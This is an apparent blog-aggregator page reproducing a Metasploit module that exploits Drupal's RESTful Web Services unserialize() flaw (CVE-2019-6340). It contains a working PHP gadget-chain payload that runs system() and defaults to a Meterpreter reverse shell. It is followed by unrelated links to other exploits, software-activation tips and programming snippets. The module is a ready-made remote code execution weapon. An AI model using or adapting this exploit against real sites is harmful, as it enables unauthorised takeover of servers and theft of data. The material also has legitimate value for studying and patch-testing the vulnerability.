##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  # NOTE: All (four) Web Services modules need to be enabled

  Rank = NormalRanking

  include Msf::Exploit::Remote::HTTP::Drupal

  def initialize(info = {})

    super(update_info(info,

      'Name'               => 'Drupal RESTful Web Services unserialize() RCE',

      'Description'        => %q{

        This module exploits a PHP unserialize() vulnerability in Drupal RESTful

        Web Services by sending a crafted request to the /node REST endpoint.

        As per SA-CORE-2019-003, the initial remediation was to disable POST,

        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable

        (albeit cached). Cached nodes can be exploited only once.

        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of

        this alternate vector.

        Drupal < 8.5.11 and < 8.6.10 are vulnerable.

      },

      'Author'             => [

        'Jasper Mattsson', # Discovery

        'Charles Fol',     # PoC

        'Rotem Reiss',     # Module

        'wvu'              # Module

      ],

      'References'         => [

        ['CVE', '2019-6340'],

        ['URL', 'https://www.drupal.org/sa-core-2019-003'],

        ['URL', 'https://www.drupal.org/psa-2019-02-22'],

        ['URL', 'https://www.ambionics.io/blog/drupal8-rce'],

        ['URL', 'https://github.com/ambionics/phpggc'],

        ['URL', 'https://twitter.com/jcran/status/1099206271901798400']

      ],

      'DisclosureDate'     => '2019-02-20',

      'License'            => MSF_LICENSE,

      'Platform'           => ['php', 'unix'],

      'Arch'               => [ARCH_PHP, ARCH_CMD],

      'Privileged'         => false,

      'Targets'            => [

        ['PHP In-Memory',

          'Platform'       => 'php',

          'Arch'           => ARCH_PHP,

          'Type'           => :php_memory,

          'Payload'        => {'BadChars' => "'"},

          'DefaultOptions' => {

            'PAYLOAD'      => 'php/meterpreter/reverse_tcp'

          }

        ],

        ['Unix In-Memory',

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Type'           => :unix_memory,

          'DefaultOptions' => {

            'PAYLOAD'      => 'cmd/unix/generic',

            'CMD'          => 'id'

          }

        ]

      ],

      'DefaultTarget'      => 0,

      'Notes'              => {

        'Stability'        => [CRASH_SAFE],

        'SideEffects'      => [IOC_IN_LOGS],

        'Reliablity'       => [UNRELIABLE_SESSION], # When using the GET method

        'AKA'              => ['SA-CORE-2019-003']

      }

    ))

    register_options([

      OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',

                            ['GET', 'POST', 'PATCH', 'PUT']]),

      OptInt.new('NODE',    [false, 'Node ID to target with GET method', 1])

    ])

    register_advanced_options([

      OptBool.new('ForceExploit', [false, 'Override check result', false])

    ])

  end

  def check

    checkcode = CheckCode::Unknown

    version = drupal_version

    unless version

      vprint_error('Could not determine Drupal version')

      return checkcode

    end

    if version.to_s !~ /^8\b/

      vprint_error("Drupal #{version} is not supported")

      return CheckCode::Safe

    end

    vprint_status("Drupal #{version} targeted at #{full_uri}")

    checkcode = CheckCode::Detected

    changelog = drupal_changelog(version)

    unless changelog

      vprint_error('Could not determine Drupal patch level')

      return checkcode

    end

    case drupal_patch(changelog, 'SA-CORE-2019-003')

    when nil

      vprint_warning('CHANGELOG.txt no longer contains patch level')

    when true

      vprint_warning('Drupal appears patched in CHANGELOG.txt')

      checkcode = CheckCode::Safe

    when false

      vprint_good('Drupal appears unpatched in CHANGELOG.txt')

      checkcode = CheckCode::Appears

    end

    # Any further with GET and we risk caching the targeted node

    return checkcode if meth == 'GET'

    # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable

    token = Rex::Text.rand_text_alphanumeric(8..42)

    res   = execute_command("echo #{token}")

    return checkcode unless res

    if res.body.include?(token)

      vprint_good('Drupal is vulnerable to code execution')

      checkcode = CheckCode::Vulnerable

    end

    checkcode

  end

  def exploit

    if [CheckCode::Safe, CheckCode::Unknown].include?(check)

      if datastore['ForceExploit']

        print_warning('ForceExploit set! Exploiting anyway!')

      else

        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')

      end

    end

    if datastore['PAYLOAD'] == 'cmd/unix/generic'

      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')

      # XXX: Naughty datastore modification

      datastore['DUMP_OUTPUT'] = true

    end

    case target['Type']

    when :php_memory

      # XXX: This will spawn a *very* obvious process

      execute_command("php -r '#{payload.encoded}'")

    when :unix_memory

      execute_command(payload.encoded)

    end

  end

  def execute_command(cmd, opts = {})

    vprint_status("Executing with system(): #{cmd}")

    # https://en.wikipedia.org/wiki/Hypertext_Application_Language

    hal_json = JSON.pretty_generate(

      'link'      => [

        'value'   => 'link',

        'options' => phpggc_payload(cmd)

      ],

      '_links'    => {

        'type'    => {

          'href'  => vhost_uri

        }

      }

    )

    print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")

    res = send_request_cgi({

      'method'   => meth,

      'uri'      => node_uri,

      'ctype'    => 'application/hal+json',

      'vars_get' => {'_format' => 'hal_json'},

      'data'     => hal_json

    }, 3.5)

    return unless res

    case res.code

    # 401 isn't actually a failure when using the POST method

    when 200, 401

      print_line(res.body) if datastore['DUMP_OUTPUT']

      if meth == 'GET'

        print_warning('If you did not get code execution, try a new node ID')

      end

    when 404

      print_error("#{node_uri} not found")

    when 405

      print_error("#{meth} method not allowed")

    when 422

      print_error('VHOST may need to be set')

    when 406

      print_error('Web Services may not be enabled')

    else

      print_error("Unexpected reply: #{res.inspect}")

    end

    res

  end

  # phpggc Guzzle/RCE1 system id

  def phpggc_payload(cmd)

    (

      # http://www.phpinternalsbook.com/classes_objects/serialization.html

      <<~EOF

        O:24:"GuzzleHttp\\Psr7\\FnStream":2:{

          s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{

            s:5:"close";a:2:{

              i:0;O:23:"GuzzleHttp\\HandlerStack":3:{

                s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";

                  s:cmd_len:"cmd";

                s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";

                  a:1:{i:0;a:1:{i:0;s:6:"system";}}

                s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";

                  b:0;

              }

              i:1;s:7:"resolve";

            }

          }

          s:9:"_fn_close";a:2:{

            i:0;r:4;

            i:1;s:7:"resolve";

          }

        }

      EOF

    ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)

  end

  def meth

    datastore['METHOD'] || 'POST'

  end

  def node

    datastore['NODE'] || 1

  end

  def node_uri

    if meth == 'GET'

      normalize_uri(target_uri.path, '/node', node)

    else

      normalize_uri(target_uri.path, '/node')

    end

  end

  def vhost_uri

    full_uri(

      normalize_uri(target_uri.path, '/rest/type/shortcut/default'),

      vhost_uri: true

    )

  end

end

[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. WebStorm 11、PhpStorm 10免费激活(不需要注册码)

    之前分享的WebStorm9.WebStrom10.PhpStorm9注册码生成网站已经被站长关了,比较遗憾!http://my.oschina.net/ximidao/blog/486353 现在官 ...

  4. 下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y),y++);

    下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y) ...

  5. ssh The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established

    The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established. ECDSA key fingerprint is SH ...

  6. jenkins git can't work ERROR: Timeout after 10 minutes ERROR: Error fetching remote repo 'origin'

    Started by user Allen Running as Allen Building remotely on MISTestSrv2 (MIS) in workspace C:\jenkin ...

  7. 10 Future Web Trends 十大未来互联网趋势

    转载自:http://blog.sina.com.cn/s/blog_4be577310100ajpb.html 我们很满意自己进入的当前网络纪元,通常被称为Web 2.0.这个阶段互联网的特征包括搜 ...

  8. CXF(2.7.10) - RESTful Services, JSON Support

    在 CXF(2.7.10) - RESTful Services 介绍了 REST 风格的 WebService 服务,数据传输是基于 XML 格式的.如果要基于 JSON 格式传输数据,仅需要将注解 ...

  9. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

随机推荐

  1. CentOS6.8 使man支持显示中文

    1.安装显示中文的man命令 wget https://src.fedoraproject.org/repo/pkgs/man-pages-zh-CN/manpages-zh-1.5.1.tar.gz ...

  2. DJango 基础(7)

    常用查询字段常用类型与模型关系表 知识点: 常用的查询 Field的常用参数 常用的模型字段类型 常用的查询 获取所有记录:rs = User.objects.all()获取第一条数据:rs = Us ...

  3. win server 2012 服务器不能ping通

    以windows server 2012作为服务器,服务器能够ping通局域网中的客户端A,但A不能ping通服务器. 解决办法: 确定服务器中系统->远程设置->远程桌面选项下为允许选项 ...

  4. c#: WebBrowser控制台输出

    还是处理视频下载所相关的问题. 有些网站,它的页面代码是由页面加载后js动态生成,那么其原始的html便不能用.页面渲染后的代码,是我们需要的 c#中,我用WebBrowser这个控件处理.设置项目类 ...

  5. [leetcode]75. Sort Colors三色排序

    Given an array with n objects colored red, white or blue, sort them in-place so that objects of the ...

  6. jsp相关笔记(一)

    1.在html中调整两个<p>标签之间的间距,可以用margin属性: p { margin: 0.2em 0;} 2.在jsp中要对页面分成上.左.右三栏时,可以用<framese ...

  7. CentOS_mini下make安装

    执行make时显示: make: *** No targets specified and no makefile found. Stop. 用网上的教程: wget http://ftp.gnu.o ...

  8. node.js获取参数的常用方法

    1.req.body 2.req.query 3.req.params 一.req.body例子 body不是nodejs默认提供的,你需要载入body-parser中间件才可以使用req.body, ...

  9. 在IDEA中配置spring boot项目的热更新

    在我使用IDEA的过程中,我发现Spring Boot项目本来自带的一个热部署工具无法使用,这里在参考各家博客后给出解决方案: 修改POM 首先POM文件需要包含spring boot的热部署工具,m ...

  10. C#字符串操作方法签名等

    class Program { /// <summary> /// C# 里Main方法不需要public,而且不允许有两个是Main(string[] args)[包括String[] ...